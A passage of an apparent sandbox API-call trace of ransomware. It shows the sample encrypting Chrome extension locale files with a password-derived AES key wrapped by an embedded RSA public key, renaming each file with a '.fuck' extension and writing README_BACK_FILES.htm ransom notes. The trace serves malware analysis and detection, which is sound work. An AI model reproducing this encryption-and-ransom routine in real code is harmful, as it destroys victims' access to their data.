Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json"), bFailIfExists=0) returned 1 [0248.339] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json", dwFileAttributes=0x0) returned 1 [0248.339] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json.gsg")) returned 1 [0248.340] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json.fuck")) returned 1 [0248.341] CryptDestroyHash (hHash=0x2938978) returned 1 [0248.341] CryptDestroyKey (hKey=0x2938af8) returned 1 [0248.341] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0248.341] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.341] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0248.341] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\readme_back_files.htm")) returned 0xffffffff [0248.342] AreFileApisANSI () returned 1 [0248.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0248.342] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.342] GetFileType (hFile=0x5d50) returned 0x1 [0248.342] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.343] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.343] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2938978 [0248.344] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.344] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.344] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.344] GetLastError () returned 0x0 [0248.344] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json")) returned 0x20 [0248.344] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json", dwFileAttributes=0x80) returned 1 [0248.345] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.345] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.345] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.346] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0248.348] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.348] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.348] CryptHashData (hHash=0x29389f8, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.348] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x29389f8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938af8) returned 1 [0248.348] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.348] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.348] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293bf18) returned 1 [0248.348] CryptImportPublicKeyInfo (in: hCryptProv=0x293bf18, dwCertEncodingType=0x1, pInfo=0x292fd50*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x292fd80*, PublicKey.cbData=0x8c, PublicKey.pbData=0x292fd88*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937238) returned 1 [0248.348] CryptEncrypt (in: hKey=0x2937238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.349] CryptEncrypt (in: hKey=0x2937238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293c798*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293c798*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.349] WriteFile (in: hFile=0x5d58, lpBuffer=0x293c798*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293c798*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.349] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd9, lpOverlapped=0x0) returned 1 [0248.351] CryptEncrypt (in: hKey=0x2938af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd9, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0248.351] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0248.351] CloseHandle (hObject=0x5d5c) returned 1 [0248.351] CloseHandle (hObject=0x5d58) returned 1 [0248.351] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json"), bFailIfExists=0) returned 1 [0248.353] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json", dwFileAttributes=0x0) returned 1 [0248.354] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json.gsg")) returned 1 [0248.355] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json.fuck")) returned 1 [0248.355] CryptDestroyHash (hHash=0x29389f8) returned 1 [0248.355] CryptDestroyKey (hKey=0x2938af8) returned 1 [0248.355] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0248.355] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.356] FindClose (in: hFindFile=0x2938978 | out: hFindFile=0x2938978) returned 1 [0248.356] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\readme_back_files.htm")) returned 0xffffffff [0248.356] AreFileApisANSI () returned 1 [0248.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3460, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0248.356] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.356] GetFileType (hFile=0x5d50) returned 0x1 [0248.356] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0248.357] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0248.357] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0248.358] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.358] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0248.358] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0248.358] GetLastError () returned 0x0 [0248.358] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\messages.json")) returned 0x20 [0248.358] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json", dwFileAttributes=0x80) returned 1 [0248.359] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0248.359] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0248.360] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0248.361] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0248.362] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0248.362] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0248.362] CryptHashData (hHash=0x2938978, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0248.362] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2938af8) returned 1 [0248.363] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0248.363] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0248.363] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293ca40) returned 1 [0248.363] CryptImportPublicKeyInfo (in: hCryptProv=0x293ca40, dwCertEncodingType=0x1, pInfo=0x292ede0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x292ee10*, PublicKey.cbData=0x8c, PublicKey.pbData=0x292ee18*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2936ef8) returned 1 [0248.363] CryptEncrypt (in: hKey=0x2936ef8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0248.363] CryptEncrypt (in: hKey=0x2936ef8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293cc60*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293cc60*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0248.363] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293cc60*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293cc60*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0248.364] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xde, lpOverlapped=0x0) returned 1 [0248.365] CryptEncrypt (in: hKey=0x2938af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xde, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0248.365] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0248.365] CloseHandle (hObject=0x5d58) returned 1 [0248.365] CloseHandle (hObject=0x5d5c) returned 1 [0248.366] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\messages.json"), bFailIfExists=0) returned 1 [0248.368] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json", dwFileAttributes=0x0) returned 1 [0248.368] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\messages.json.gsg")) returned 1 [0248.369] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\messages.json.fuck")) returned 1 [0248.370] CryptDestroyHash (hHash=0x2938978) returned 1 [0248.370] CryptDestroyKey (hKey=0x2938af8) returned 1 [0248.370] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0248.370] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0248.370] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0248.371] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\readme_back_files.htm")) returned 0xffffffff [0248.371] AreFileApisANSI () returned 1 [0248.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3700, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0248.371] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0248.371] GetFileType (hFile=0x5d50) returned 0x1 [0248.371] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, 